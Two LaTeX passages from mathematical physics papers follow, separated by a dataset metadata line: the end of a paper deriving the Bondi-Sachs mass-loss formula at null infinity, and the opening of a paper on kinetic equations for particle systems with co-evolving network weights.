\mathfrak{m} = A^{-1}\left(\sigma \Phi_{20} - A \psi_2\right).
\]
As it stands, this expression is neither real nor conformally invariant. We address both issues next.
As mentioned in sec.~\ref{sec:asympt-flatn-struct} the imaginary part of \eqref{eq:19} is intrinsic to $\mathscr{I}$ and it yields the following equation
\[
-\etp\Phi_{01} + \eth\Phi_{10} = {\bar\sigma} \Phi_{02} - \sigma \Phi_{20} +A \psi_2 - A {\bar\psi}_2,
\]
which after inserting \eqref{eq:9} becomes
\begin{equation}
\label{eq:48}
- A \psi_2 + \sigma \Phi_{20} + \etp^2\sigma = - A {\bar\psi}_2 + {\bar\sigma} \Phi_{02} + \eth^2{\bar\sigma} .
\end{equation}
so that the addition of the $\etp^2\sigma$ term yields a real quantity.
However, this expression is still not conformally invariant. As it stands it is the result of evaluating a conformal density in a Bondi system which is defined by $\rho'=0$ and $\tau=0$. We can find out what the full expression must look like by transforming to a different gauge and observing which terms appear. This calculation suggests to define a conformal density $N$ of weights $[-2;-2,2]$ by
\begin{equation}
\label{eq:49}
N = \Phi_{20} - \rho' {\bar\sigma} - \etp{\bar\tau} + {\bar\tau}^2.
\end{equation}
We will see below that it is closely related to Bondi's \emph{news function}. Now we can define the mass-aspect $\mathfrak{m}$ as a conformal density $\mathfrak{m}:[-3;0,0]$ by the equation
\begin{equation}
\label{eq:50}
A \mathfrak{m} = - A\psi_2 + \sigma N + \etbc[2]\sigma.
\end{equation}
Note the appearance of the conformal $\etbc$ operator here. The advantage of writing $\mathfrak{m}$ in this way is that it becomes manifestly conformally invariant since each term is a conformal density. However, when rewritten in terms of the usual $\etp$-operator then the mass-aspect becomes almost the familiar expression, namely
\[
\mathfrak{m} = A^{-1}\left(- A\psi_2 + \sigma \Phi_{20} + \etp^2\sigma - \rho' \sigma{\bar\sigma} \right).
\]
The next step is to compute the derivative of $\mathfrak{m}$ along the generators. To do this we need to find the ${\thorp_c}$-derivatives of the quantities defining the mass-aspect. The easy ones are
\[
{\thorp_c} A = 0,\qquad {\thorp_c} \sigma = -\overline{N}.
\]
Next we compute the derivatives of $N$. After a calculation using \eqref{eq:23} we find the result
\begin{equation}
\label{eq:51}
{\thorp_c} N = A \psi_4 - \etbc \overline{\cP}.
\end{equation}
Similarly, using the difference of \eqref{eq:20} and \eqref{eq:21} we find that
\begin{equation}
\label{eq:52}
\ethc N = A \psi_3 + \etbc Q.
\end{equation}
The derivative of $\mathfrak{m}$ along the generators can be computed in a straightforward way using the intrinsic equations that we have just established. We find the intriguing formula
\begin{equation}
\label{eq:53}
A {\thorp_c} \mathfrak{m} = - N\overline{N} - \ethc[2]N - \etbc[2]\overline{N} + \ethc\etbc Q .
\end{equation}
\section{The mass-loss formula}
\label{sec:mass-loss-formula}
At this point we have everything in place to discuss the Bondi-Sachs mass-loss formula.
We first define the following integral for a given cut $\mathcal{C}$ of $\mathscr{I}$ and an arbitrary conformal density $U$ with weights $[1;0,0]$
\begin{equation}
\label{eq:54}
4\pi m_\mathcal{C}[U] = \int_{\mathcal{C}}U\left(\sigma N + \etbc[2]\sigma - A \psi_2 \right) A^{-1}\, \mathrm{d}^2\mathcal{S}.
\end{equation}
Here, $\mathrm{d}^2\mathcal{S}=\i\overline{\mathbf{m}}\mathbf{m}$ is the area 2-form on $\mathcal{C}$ induced from the unphysical metric $g_{ab}$. Note, that with $U$ of the given type the integral is well-defined in the sense that the integrand is a conformal density with vanishing weights so that the value is unambiguously defined.
The main achievement of the analysis by Bondi and coworkers\cite{Bondi:1960,Bondi:1962,Sachs:1962a} in the early 1960 is the formulation of the mass-loss formula which has been given in many different formulations since then. We will provide here another point of view on the mass-loss which highlights the tight interplay between the asymptotic translations and the properties of the mass-aspect. Our presentation follows closely the one given in~\cite{Penrose:1986} based on Stokes' theorem as formulated in app.~\ref{sec:stokes-theorem-cghp}.
Consider the 2-form $\pmb{\mu} = \mu_0\, \i\overline{\mathbf{m}}\mathbf{m} + \mu_1 \i \,\mathbf{l}\mathbf{m} - \mu_2\,\i \mathbf{l}\overline{\mathbf{m}}$ on $\mathscr{I}$ defined by
\[
\begin{aligned}
\mu_0 &= A^{-1} U\left(\sigma N + \etbc[2]\sigma - A \psi_2 \right),\\
\mu_1 = \bar{\mu}_2 &= A^{-1}\left(U\ethc (N + \tfrac12 \overline{R}) - \ethc U (N + \tfrac12 \overline{R})\right)
\end{aligned}
\]
then $\pmb{\mu}$ pulled back to any cut $\mathcal{C}$ is the Bondi energy-momentum relative to $U$ evaluated on that cut. Let $\mathcal{C}_1$ and $\mathcal{C}_2$ be any two cuts from the family defined by constant $s$ and integrating $\mathrm{d}\pmb{\mu}$ over the 3-dimensional piece $\mathscr{I}_1^2$ between them yields via Stokes' theorem
\[
m_2[U] - m_1[U] = \frac1{4\pi}\int_{\mathscr{I}_1^2} \mathrm{d}\pmb{\mu} .
\]
Using~\eqref{eq:72} we find $\mathrm{d}\pmb{\mu}$ by computing
\[
\begin{multlined}
A\left({\thorp_c}\mu_0 + \ethc\mu_1 + \etbc\mu_2\right) = {\thorp_c} U A \mathfrak{m} - U N\overline{N} - U \ethc[2]N - U\etbc[2]\overline{N} + U\ethc\etbc\mathcal{Q} \\
+ U \ethc[2](N+\tfrac12\overline{R}) - \ethc[2]U\, (N + \tfrac12 \overline{R})
+ U \etbc[2](\overline{N}+\tfrac12R) - \etbc[2]U\, (\overline{N} + \tfrac12 R) \\
= - U N\overline{N} + U(\ethc\etbc\mathcal{Q} + \tfrac12 \ethc[2]\overline{R} + \tfrac12 \etbc[2]R) - UR \, (N + \tfrac12 \overline{R}) - U\overline{R} \, (\overline{N} + \tfrac12 R)\\
- (\ethc[2]U - R U)\, (N + \tfrac12 \overline{R})
- (\etbc[2]U - \overline{R} U)\, (\overline{N} + \tfrac12 R) + {\thorp_c} U A \mathfrak{m}\\
= - U (N\overline{N} + R \, N + \overline{R} \,\overline{N} + R\overline{R})\\
- (\ethc[2]U - R U)\, (N + \tfrac12 \overline{R})
- (\etbc[2]U - \overline{R} U)\, (\overline{N} + \tfrac12 R) + {\thorp_c} U A \mathfrak{m}
\end{multlined}
\]
The form of the first term in the final expression suggests to consider the quantity $\mathscr{N} = N+\overline{R}$. Inspection of \eqref{eq:42}, \eqref{eq:51} and \eqref{eq:52} shows that $\mathscr{N}$ satisfies
\begin{equation}
{\thorp_c}\mathscr{N} = A \psi_4, \qquad \ethc\mathscr{N} = A \psi_3,\label{eq:55}
\end{equation}
so that $\mathscr{N}$ can be considered as a potential for the part of the Weyl tensor that is entirely intrinsic to $\mathscr{I}$. Note, that these two simultaneous equations for $\mathscr{N}$ can be solved because their integrability condition is the Bianchi equation~\eqref{eq:33} for $k=3$. We will take this as the defining property for the \emph{Bondi news} $\mathscr{N}$.
Now the calculation above proves the following
\begin{thm}[Bondi-Sachs mass-loss formula]
Let $U\in \mathscr{T}$ be an arbitrary translation and let $\mathcal{C}_1$ and $\mathcal{C}_2$ be two arbitrary $s$-cuts, then
\[
m_2[U] - m_1[U] = -\frac1{4\pi}\int_{\mathscr{I}_1^2} U \,\mathscr{N}\bar{\mathscr{N}}\, \mathrm{d}^3V.
\]
Furthermore, if $U$ is a time translation (so that $U>0$) then\jf{Maybe talk about that in the appendix}
\[
m_2[U] < m_1[U] .
\]
\end{thm}
Note, that the mass-loss formula holds only if $U$ is an asymptotic translation, and therefore, only in this case are we justified to interpret~\eqref{eq:54} as a component of an energy-momentum. Furthermore, note that $m_\mathcal{C}[U]$ is linear in $U$ and, therefore, it scales with the 'size' of $U$. Not only for this reason it is important to have a Lorentz metric defined on $\mathscr{T}$ which allows us to normalise $U$. It also allows us to distinguish temporal from spatial translations. Thus, when $U$ is time-like \eqref{eq:54} defines an energy, while for space-like $U$ we get a momentum component.
Finally, we come back to the mass-aspect. We defined it in \eqref{eq:50} without any reference to asymptotic translations based entirely upon the requirements of reality and conformal invariance. However, in view of the fact that it is integrated against an asymptotic translation we can now also redefine the mass-aspect due to the following calculation
\[
\begin{multlined}
\int_\mathcal{C} U \left(\sigma N + \etbc[2]\sigma - A\psi_2\right)\,A^{-1}\mathrm{d}^2\mathcal{S} =
\int_\mathcal{C} U \left(\sigma N - A\psi_2\right)\,A^{-1} + \sigma\etbc[2]UA^{-1}\mathrm{d}^2\mathcal{S} \\
= \int_\mathcal{C} U \left(\sigma N - A\psi_2\right)\,A^{-1} + \sigma\overline{R} UA^{-1}\mathrm{d}^2\mathcal{S} =
\int_\mathcal{C} U \left(\sigma \mathscr{N} - A\psi_2\right)\,A^{-1}\mathrm{d}^2\mathcal{S} .
\end{multlined}
\]
Thus, we could also adopt the definition
\begin{equation}
\label{eq:56}
\mathfrak{m} = A^{-1}\left(\sigma \mathscr{N} - A\psi_2\right)
\end{equation}
for the mass-aspect. This definition looks very similar to the one given at the beginning of sec.~\ref{sec:mass-aspect} except that $N=\Phi_{20}$ is replaced by the news $\mathscr{N}$. Note, that this definition is conformally invariant and, when integrated against an asymptotic translation yields real values. However, the definitions \eqref{eq:50} and \eqref{eq:56} are not identical as conformal densities on $\mathscr{I}$. They yield the same values only when integrated against an asymptotic translation, i.e., they define the same energy-momentum covector regarded as a linear form on $\mathscr{T}$.
\section{Computing the Bondi energy-momentum}
\label{sec:comp-bondi-energy}
In this final section we want to briefly discuss how one would go about explicitly calculating the Bondi energy and momenta when faced with a representation of $\mathscr{I}$ which is not a Bondi system. Let us assume that we are given 3-dimensional null hypersurface of a space-time given in the form of a family of 2-dimensional cuts labeled by a scalar $s$. We are also given a null tetrad which we can assume to be adapted to the cuts in the sense that $n^a$ points along the null generators and $m^a$ is tangent to the cuts. This can always be achieved by at most two null rotations. On each cut we have all the spin-coefficients and curvature quantities available, all given with respect to some generic fixed coordinate system.
This situation occurs in numerical relativity, when one solves equations which allow full access to null infinity but which deny the possibility to introduce gauges adapted to $\mathscr{I}$ because of some numerically relevant considerations. An example which was the motivation for this work is described in~\cite{Beyer:2017}.
In order to compute an energy-momentum component on a given cut $\mathcal{C}$ one needs two main ingredients, the mass-aspect and an asymptotic translation $U$. The latter is more involved to compute so we describe this first. We need to select an appropriate solution of the equation~\eqref{eq:39}. The way we proceed is to first compute a conformal factor $\Omega$ which scales the unit-sphere metric to the metric on $\mathcal{C}$. It must satisfy the equation
\begin{equation}
\label{eq:57}
\Omega^2 K + \Omega\, \eth\etp \Omega - \eth \Omega\, \etp \Omega = 1 .
\end{equation}
where the $\eth$-operator is defined in terms of the given null tetrad and the corresponding spin-coefficients and with $K$ also being computed from the given data on the cut. This is a non-linear elliptic equation for $\Omega$ which has a unique solution.
The conformal factor $\Omega$ defines a conformal density with weights $[1;0,0]$ so that we can write every asymptotic translation in the form $U=\Omega V$ with a scalar function $V$. Furthermore, from~\eqref{eq:47} we have $q[\Omega] = 1$ so that $\Omega$ satisfies~\eqref{eq:39}. Inserting $U$ into~\eqref{eq:39} we obtain an equation for $V$
\[
2\ethc\Omega\ethc V + \Omega\ethc[2]V = 0.
\]
Rewriting this equation in terms of the usual $\eth$-operator on $\mathcal{C}$ yields
\begin{equation}
\label{eq:58}
\eth\left(\Omega^2\eth V\right) = 0.
\end{equation}
This equation has four linearly independent solutions, one being $V=1$, corresponding to $\Omega$ being a solution of~\eqref{eq:39}. It defines a time-like translation. The other three solutions can be chosen to correspond to translations in three mutually orthogonal space-like directions. To this end one needs the scalar product on $\mathcal{T}$ in order to produce an orthonormal basis for the solution space.
There is one practical aspect related to the use of the quadratic form $q[U]$. As defined in \eqref{eq:44} or \eqref{eq:45} it is a constant \emph{function} on $\mathscr{I}$. For practical purposes it is much better to compute a single number. This is most easily done by integrating the function over the full cut. Let $|\mathcal{C}|$ denote the area of the cut then, since $q[U]$ is constant for all asymptotic translations, we have
\[
q[U] = \frac2{|\mathcal{C}|} \int_{\mathcal{C}} K U^2 - 2 \eth U\, \etp U\; \mathrm{d}^2\mathcal{S}
\]
after an integration by parts. Note that, in a Bondi frame where $K=\frac12$ and for the time translation given by $U=1$ this formula yields $q[U]=1$ due to the Gauß-Bonnet theorem.
Once the translations have been selected one needs to compute the momenta by integrating them against the mass-aspect. In principle, this can be done by using any of the two definitions of the mass-aspect but both of those have disadvantages from a practical point of view: the definition in \eqref{eq:56} involves $R$ which must be obtained by solving an equation while the definition in \eqref{eq:50} involves a second order derivative. To avoid both issues one can also use the integral
\[
m_\mathcal{C}[U] = \int_{\mathcal{C}} U N (A^{-1}\sigma) - U \psi_2 - \etbc U \etbc (A^{-1}\sigma) \, \mathrm{d}^2\mathcal{S},
\]
which is obtained from \eqref{eq:50} by integrating by parts.
\section{Discussion}
\label{sec:conclusion}
In this work we have presented a treatment of null infinity and the Bondi energy-momentum which is manifestly conformally invariant and makes no reference to any special gauge. Most discussions of the subject jump very quickly to the introduction of a simplifying gauge (which always exists). The only exception seems to be Geroch's discussion~\cite{Geroch:1977} of null infinity (see also \cite{Tafel:2000} for related questions). For us, the motivation to revisit the issue of the Bondi energy-momentum and the interplay with the asymptotic translations arose from the need to compute the Bondi mass under circumstances which are far away from any simplifying gauges. In a related paper~\cite{Frauendiener:2021b} we present our numerical implementation of the present theoretical discussion in an application where we study the response of a black hole to the impact of gravitational waves.
We hope that our treatment of null infinity offers some new insights into the subject. In particular, the characterisation of the Bondi news ``function'' as a potential for the intrinsic part of the Weyl tensor is very simple and gauge independent. In our treatment of the topic we were guided by the notion of conformal invariance. It might be useful to spell out here what is meant by this term. To be sure, the notion of the Bondi-Sachs energy-momentum is a property of the physical space-time and, therefore, only defined for the physical metric. It is not conformally invariant in the sense of giving the same values when the metric is rescaled by an arbitrary conformal factor. Instead, we represent the physical metric $\tilde g_{ab}$ in terms of a conformal factor $\Omega$ and a metric $g_{ab}$ (see~\eqref{eq:1}) as $\tilde g_{ab}=\Omega^{-2}g_{ab}$. Clearly, all physical properties attributed to the metric $\tilde g_{ab}$ should be independent of the specific choice of $\Omega$ and $g_{ab}$ made to represent it, i.e., they should be invariant if $(g_{ab},\Omega)$ is replaced by $(\theta^2g_{ab},\theta\Omega)$ for arbitrary non-vanishing functions $\theta$.
The Lorentzian metric on the space of asymptotic translations seems to have been unknown until now, at least in its explicit form as given here. It is present in all treatments of $\mathscr{I}$ albeit mostly implicitly, being defined in terms of a basis for the translations given by the first four spherical harmonics.
The appearance of the co-curvature $R$ is crucial for the consistency of the entire structure on $\mathscr{I}$. On the one hand, its presence should not surprise us since Geroch had already introduced the corresponding tensorial quantity. However, on the other hand, its importance may have been underestimated until now. It appears in our treatment essentially as an auxiliary field that mediates between $\ethc$ and $\etbc$ equations on $\mathscr{I}$ but clearly it is intimately tied in with the geometric properties of a 2-surface and its embedding into a null hypersurface. It would not be surprising if it turned out that the co-curvature also plays a major role in a satisfactory definition of quasi-local energy-momentum \cite{Szabados:2009,Penrose:1982,Penrose:1984}. This remains to be seen.
Finally, let us comment on the cGHP formalism. In our discussion we have made the assumption that the null tetrad on $\mathscr{I}$ is adapted to some family of cuts of $\mathscr{I}$. The reason for this assumption was merely to simplify the equations because it implies that $\rho$ is real; it is by no means necessary. In fact, there might be an advantage when the only condition imposed on the frame is that $n^a$ be aligned with the null generators of $\mathscr{I}$ and leaving the freedom of a null rotation around that vector. Then the null congruence generated by the transverse null vector $l^a$ is no longer surface forming and $\rho$ acquires an imaginary part. This is the setup that is necessary to discuss the remarkable results by Newman and coworkers~\cite{Adamo:2012} about equations of motion of (charged) particles in a relativistic field being obtained from the asymptotic structure of null infinity alone. It is hoped that the comparative simplicity of the cGHP formalism (at least on $\mathscr{I}$) may help to shed some new light onto these developments which are hidden behind some rather complicated calculations.
| 2024-02-18T23:40:20.249Z | 2021-08-03T02:06:38.000Z | algebraic_stack_train_0000 | 2,098 | 10,435 |
|
proofpile-arXiv_065-10250 | \section{Introduction}
Following the seminal work by Boltzmann and Maxwell (cf. \cite{boltzmann,maxwell}), kinetic equations have
emerged as a standard tool for the description of (stochastic) interacting particle systems.
Nowadays their rigorous mathematical treatment as well as the derivation of macroscopic
models (cf. \cite{bouchut,cercignani,cercignani2,cercignani3,glassey,villani}) are reasonably well understood. In many modern applications of interacting
particle systems, in particular in social and biological systems, there is a key ingredient
not included in the basic assumptions of kinetic theory, namely a dynamic network structure
between particles (rather called agents in such systems and thus used synonymously in this paper).
While models in physics assume that interactions happen if particles are spatially close, social
interactions rather follow a network structure between particles, which changes at the same
time as the state of the particles (thus called co-evolution, cf. \cite{thurner} and references therein). A canonical example is
the formation of opinions or norms on social networks, where interactions can only happen if
the agents are connected in the network. On the other hand the network links are constantly
changing, and these processes influence each other: Opinions change if there is a connection,
e.g. for followers of some posts. Vice versa agents may tend to follow others with similar
opinions.
In this paper we thus want to establish an approach towards kinetic equations for interacting
particle systems with co-evolving network structures. We consider processes where each
agent has a state that can change in an interaction and there is a network weight between
two agents (zero if not connected), which can change over time. This includes a variety of
microscopic agent-based models in recent literature. We start from a Liouville-type equations
that describes the evoluion of the joint probability measure of the N agent states as well as the
$N(N - 1)$ weights between agents (respectively $\frac{N(N-1)}2$ in the case of undirected networks).
From those we derive a moment hierarchy resembling the original BBGKY-hierarchy, with
the difference that here we derive equations for the probability measure describing k agent
states and $k(k - 1)$ weights between them ( $\frac{k(k-1)}2$ in the undirected case).
It turns out that a key difference to standard types of kinetic models without co-evolving
networks (weights) is the problem to find a simple closure relation. Since the one-particle
distribution does not depend on weights at all, there is obviously no solution of the hierarchy
in the form of product measures (as the classical Stosszahlansatz by Boltzmann). We show
that such a solution exists only in the case of special solutions that exhibit concentration
in the weight variables. In the general case we propose a closure relation at the level of
the two-particle and single-weight distribution. We discuss the mathematical properties of
the resulting equations as well as the existence of different types of stationary solutions,
which are relevant for processes on social networks (such as opinion formation of social norm
construction).
In several examples we discuss how the kinetic equations and some special forms relate
to agent-based models recently introduced in literature. Among others these microscopic models have been used to simulate the following issues:
\begin{itemize}
\item Opinion formation on social networks, including polarization and the formation of echo chambers
(cf. \cite{baumann,benatti,boschi,chitra,gu,maia,nigam,sugishita})
\item Knowledge networks (cf. \cite{tur}), with state $s$ being a degree of knowledge.
\item Social norm formation and social fragmentation (cf. \cite{kohne,pham,pham2})
\item Biological transport networks (cf. \cite{hu,albi}), with state corresponding to a pressure or similar variable and the weight encoding the capacity of network links.
\end{itemize}
The derivation of macroscopic models in this context is not just a mathematical exercise, but appears to be of high relevance in order to obtain structured predictions about pattern formation in such systems. While agent-based models rely on simulations for special parameter sets, which can hardly be calibrated from empirical data, the analysis of macroscopic models can provide explanations and predictions of patterns and transitions obtained at the collective level. In this way some concerns about agent-based models like their reproducibility and their limitation to special parameter values (cf. \cite{carney,conte,donkin}) can be avoided.
The paper is structured as follows: in Section 2 we discuss a paradigmatic model based on a Vlasov-type dynamics, which allows to highlight the basic ideas and properties of the microscopic models, in particular the description via a distribution of $N$ particles and $N(N-1)$ weights. Section 3 presents a general structure for microscopic models and discusses several special cases with examples from agent-based simulations in literature. In Section 4 we discuss the hierarchy obtained from the moments of the microscopic distribution and its infinite limit. We highlight the non-availability of a closed-form solution in terms of a single particle distribution and the need to describe the system in terms of a pair distribution (the distribution for two particles and the weight between them). As a consequence we also discuss possible closure relations at the level of the pair distribution. These closure relations are further investigated for a minimal model with binary states and weights in Section 5. At this level we can also identify simple structural assumptions for the formation of polarization patterns. Section 6 is devoted to a more detailed mathematical study of the macroscopic version of the paradigmatic model from Section 2, with a particular focus on a closure relation based on the conditional distribution. In Section 7 we further discuss some modelling issues like social balance theory and related processes, which effectively lead to triplet interactions
in weights or states. Finally, we also discuss a variety of
open and challenging mathematical problems for the equations at the level of pair distributions.
\section{A Paradigmatic Model: Vlasov-type Dynamics}
In this section and for the exposition of further arguments we consider the genuine system
\begin{align}
\frac{ds_i}{dt} &= \frac{1}N \sum_{j \neq i} U(s_i,s_j,w_{ij}) \label{eq:microscopic1} \\
\frac{dw_{ij}}{dt} &= V(s_i,s_j,w_{ij}) \label{eq:microscopic2}
\end{align}
in order to highlight the mathematical properties and the derivation of macroscopic equations.
In a similar spirit as \cite{thurner} we will use the continuous time model as a paradigm, but in an analogous way we will also consider other types of interactions leading to kinetic equations in the next section. Here $s_i \in \R^m$ denotes the state variable
and $w_{ij} \in \R$ the weight between node $i$ and $j$. This minimal model naturally encodes the typical processes and network co-evolutions as also proposed in \cite{thurner}. The interactions of states are mitigated by the weight on the edge between them, while the change of weights on an edge depends on the states of the vertex it connects. Note that we have incorporated a mean-field scaling already in the above system, other types of scaling are left for future research. Let us mention that \eqref{eq:microscopic1}, \eqref{eq:microscopic2} shares some similarities with the interaction models with time varying weights, which have been analyzed in detail in \cite{ayi,mcquade,pouradier}. In their case the weight is independent of $j$ however, which corresponds to a special solution where $V$ is independent of $s_j$ and the $w_{ij}$ have the same initial value for all $j$.
In many cases it is desirable to have symmetry of the network (coresponding to an undirected graph), i.e. $w_{ij} = w_{ji}$ for $i \neq j$, and no loops, i.e. $w_{ii}=0$. This is preserved by a natural symmetry condition for $V$, namely
\begin{equation} \label{eq:Vsymmetry}
V(s,\sigma,w) = V(\sigma,s,w) \qquad \forall s,\sigma \in \R^m, w \in \R.
\end{equation}
We shall assume that $U$ and $V$ are Lipschitz-continuous functions, which directly implies the existence and uniqueness for \eqref{eq:microscopic1}, \eqref{eq:microscopic2} by the Picard-Lindel\"of Theorem.
\begin{prop}
Let $U: \R^m \times \R^m \times \R \rightarrow \R^m$ and $V: \R^m \times \R^m \times \R \rightarrow \R$ be Lipschitz-continuous functions. Then there exists a unique solution of the initial-value problem for \eqref{eq:microscopic1}, \eqref{eq:microscopic2} such that $s_i \in C^1(\R_+)$, $w_{ij} \in C^1(\R_+)$ . If $w_{ij}(0) = w_{ji}(0)$ for all $i \neq j$ and \eqref{eq:Vsymmetry} is satisfied, then
$w_{ij}(t) = w_{ji}(t)$ for $i \neq j$ and all $t \in \R_+$.
\end{prop}
Let us mention a canonical example of the interactions, namely
\begin{equation} \label{eq:Uexample}
U(s_i,s_j,w_{ij}) = - w_{ij} K(s_i-s_j)
\end{equation}
with an odd kernel $K$ (e.g. $K=\nabla G$ for an even and attractive potential) and
\begin{equation} \label{eq:Vexample}
V(s_i,s_j,w_{ij}) = \eta(s_i-s_j) - \kappa w_{ij}
\end{equation}
with nonnegative kernels $\eta$ and $\kappa$. Here $w_{ij}$ is directly the interaction strength, the weight is increased for states $s_i$ and $s_j$ close and decays with relaxation time $\kappa^{-1}$. If $\eta = - c G$ for some constant $c > 0$, then the model \eqref{eq:microscopic1}, \eqref{eq:microscopic2} has a gradient structure of the form
\begin{equation} \label{eq:microscopicgf}
\frac{ds_i}{dt} = - \nabla_{s_i} E^N, \qquad \frac{dw_{ij}}{dt} = - 2 c N \partial_{w_{ij}} E^N \end{equation}
with the microscopic energy functional
\begin{equation}
E^N(s_1,\ldots,s_N,w_{12},\ldots,w_{N,N-1}) = \frac{1}{2N} \sum_{i=1}^N \sum_{j\neq i} \left( w_{ij} G(s_i-s_j) + \frac{\kappa w_{ij}^2}{2c}\right).
\end{equation}
A more general version of gradient flows is obtained with \eqref{eq:microscopicgf} and the more general energy functional
\begin{equation}
E^N(s_1,\ldots,s_N,w_{12},\ldots,w_{N,N-1}) = \frac{1}{2N} \sum_{i=1}^N \sum_{j\neq i} F(s_i,s_j,w_{ij} ) .
\end{equation}
This implies that the forces are derived from the potential $F$ via
\begin{equation} \label{eq:potential}
U(s,\sigma,w) = - \nabla_{s} F(s,\sigma,w), \qquad V(s,\sigma,w) = - c \partial_{w} F(s,\sigma,w).
\end{equation}
\subsection{The $N$-particle and weight measure}
In classical kinetic theory the evolution of the system is first described by the joint measure of the $N$ particles, which corresponds to $s_1, \ldots, s_N$. In our setting we need to extend this to a joint measure of the $N$ states $s_i$ and the $N(N-1)$ weights $w_{ij}$, which we denote by $\mu^N_t$ and still denote as $N$-particle measure.
The corresponding Liouville-type equation for $\mu^N_t$ is given by
\begin{equation} \label{eq:liouville}
\partial_t \mu^N_t + \frac{1}N \sum_i \sum_{j \neq i} \nabla_{s_i} \cdot ( U(s_i,s_j,w_{ij}) \mu_t^N )
+ \sum_i \sum_{j \neq i} \partial_{w_{ij}} \cdot ( V(s_i,s_j,w_{ij}) \mu_t^N ) = 0.
\end{equation}
The weak formulation of \eqref{eq:liouville} is given by
\begin{align}
\frac{d}{dt} \int \varphi(z_N) \mu_t^N(dz_N) =& \sum_i \sum_{j \neq i} \int ( \frac{1}N \nabla_{s_i} \varphi(z_N) U(s_i,s_j,w_{ij}) +
\nonumber \\ & \qquad \qquad
\partial_{w_{ij}} \varphi(z_N) V(s_i,s_j,w_{ij}) )\mu_t^N(dz_N) , \label{eq:liouvilleweak}
\end{align}
for $\varphi \in {\cal S}(\R^{N(m+1)})$.
For Lipschitz-continuous velocities $U$ and $V$ the existence and uniqueness of a weak solution can be modified in a straight-forward way by the method of characteristics (cf. \cite{golse}), the solution $\mu_t^N$ is the push-forward of $\mu_0^N$ under the unique solutions $(s_i,w_{ij})$ of \eqref{eq:microscopic1}, \eqref{eq:microscopic2}.
In the case of forces derived from a potential $F$, i.e. \eqref{eq:potential}, the energy is given by
$$ E[\mu_t^N] = \frac{1}{2N} \sum_{i=1}^N \sum_{j\neq i} \int F(s_i,s_j,w_{ij}) ~\mu_t^N(dz_N) , $$
the gradient flow structure is propagated to the Liouville equation in an Otto-type geometry (cf. \cite{jko,otto}) as
\begin{align*}
\partial_t \mu^N_t &= \sum_i \sum_{j \neq i} \nabla_{s_i} \cdot ( \mu_t^N \nabla_{s_i} E')
+ 2c N \sum_i \sum_{j \neq i} \partial_{w_{ij}} ( \partial_{w_{ij}}E(s_i,s_j,w_{ij}) \mu_t^N ) .
\end{align*}
In particular we obtain an energy dissipation of the form
$$ \frac{d}{dt} E[\mu_t^N] = - \sum_i \sum_{j \neq i} \int \left( \vert\nabla_{s_i} F(s_i,s_j,w_{ij})\vert^2 + c (\partial_{w_{ij}}F(s_i,s_j,w_{ij}))^2 \right)~\mu_t^N(dz_N).$$
We will later return to the gradient flow structure and dissipation in the context of macroscopic equations and investigate their possible preservation.
\subsection{Time Scales}
Concerning time we can investigate different scaling limits, which effectively mean a relative scaling of the forces $U$ and $V$. We also discuss a third (mixed) case, which relates to the concept of network-structured models in the limit.
\subsubsection{Instantaneous Network Formation}
In some models the network is rebuilt in very small time scales. An extreme case with instantaneous network formation are early bounded confidence models of opinion formation such as the Hegselmann-Krause \cite{hegselmann} or
Deffuant-Weissbuch model \cite{deffuant}, where the network is built in each time steps between all agents having opinions inside a certain confidence interval. In order to model such a situation it is convenient to introduce a small parameter $\epsilon > 0$ in \eqref{eq:microscopic2} and instead considered the scaled equation.
\begin{equation}
\epsilon \frac{dw_{ij}}{dt} = V(s_i,s_j,w_{ij}) \label{eq:microscopic2a}
\end{equation}
The corresponding Liouville equation is given by
\begin{equation} \label{eq:liouvilleeps}
\partial_t \mu^N_t + \frac{1}N \sum_i \sum_{j \neq i} \nabla_{s_i} \cdot ( U(s_i,s_j,w_{ij}) \mu_t^N )
+ \frac{1}\epsilon \sum_i \sum_{j \neq i} \partial_{w_{ij}} \cdot ( V(s_i,s_j,w_{ij}) \mu_t^N ) = 0.
\end{equation}
In the simplest case there exists a unique solution $\omega(s,\sigma)$ of the equation
\begin{equation} \label{eq:omega}
V(s,\sigma,\omega(s,\sigma)) = 0
\end{equation}
and we expect convergence to the reduced equation
\begin{equation}
\partial_t \mu^N_t + \frac{1}N \sum_i \sum_{j \neq i} \nabla_{s_i} \cdot ( U(s_i,s_j,\omega(s_i,s_j)) \mu_t^N ) = 0
\end{equation}
under suitable properties of $V$. This equation is in the standard form of interaction equations for the particles $s_i$ that can be described by a mean-field limit (cf. \cite{golse}).
Note that we can also study the problem at a fast time scale (rescaled from $t$ to $\epsilon^{-1}t$), which corresponds to \eqref{eq:microscopic2} coupled with
$$\frac{ds_i}{dt} = \epsilon \frac{1}N \sum_{j \neq i} U(s_i,s_j,w_{ij}). $$
Apparently the limit is given by stationary states $s$ at this scale and thus \eqref{eq:microscopic2} is a pure network adaption model in a given environment
$$ \frac{dw_{ij}}{dt}(t) = V(s_i,s_j,w_{ij}(t)) = V_{ij}(w_{ij}(t). $$
\subsubsection{Instantaneous State Adaption}
The opposite time scale is related to a fast adaptation of states instead of the weights. This amounts to \eqref{eq:microscopic2} coupled with
\begin{equation}
\epsilon \frac{ds_i}{dt} = \frac{1}N \sum_{j \neq i} U(s_i,s_j,w_{ij}).
\end{equation}
The limit $\epsilon \rightarrow 0$ is much more complicated in this case compared to the instantaneous network adaption. Formally it is described by $\sum_{j \neq i} U(s_i,s_j,w_{ij})=0$, which is a fully coupled system among the states and weights.
At a fast time scale we obtain instead stationarity of the weights $w_{ij}$ and hence the state adaption is a standard interacting particle system (in a heterogenous environement however)
\begin{equation}
\frac{ds_i}{dt}(t) = \frac{1}N \sum_{j \neq i} U(s_i(t),s_j(t),w_{ij}) =
\frac{1}N \sum_{j \neq i} U_{ij}(s_i(t),s_j(t) ).
\end{equation}
The mathematical complication in a limit of this system for large $N$ is inherent in the fact that the particles are not indistinguishable due to the specific forces $U_{ij}$.
\subsubsection{Network-Structured Models}
Let us finally consider a case where the state is composed of two distinct parts $s_i=(x_i,y_i)$ such that
$V$ depends only on the first part $x_i$. If we now consider a fast adaption in the $x$ part as well as the weights the effective limit will provide stationary weights $w_{ij} = \omega(x_i,x_j)$ and the remaining equation for the $y$ components becomes (with $U^Y$ the corresponding component of the force $U$)
\begin{equation}
\frac{dy_i}{dt}(t) = \frac{1}N \sum_{j \neq i} U^Y(x_i,y_i(t),x_j,y_j(t),\omega(x_i,x_j)) =
\frac{1}N \sum_{j \neq i} \tilde U(x_i,x_j;y_i(t),y_j(t)).
\end{equation}
This corresponds to the framework of network-structured models derived in \cite{burger2}.
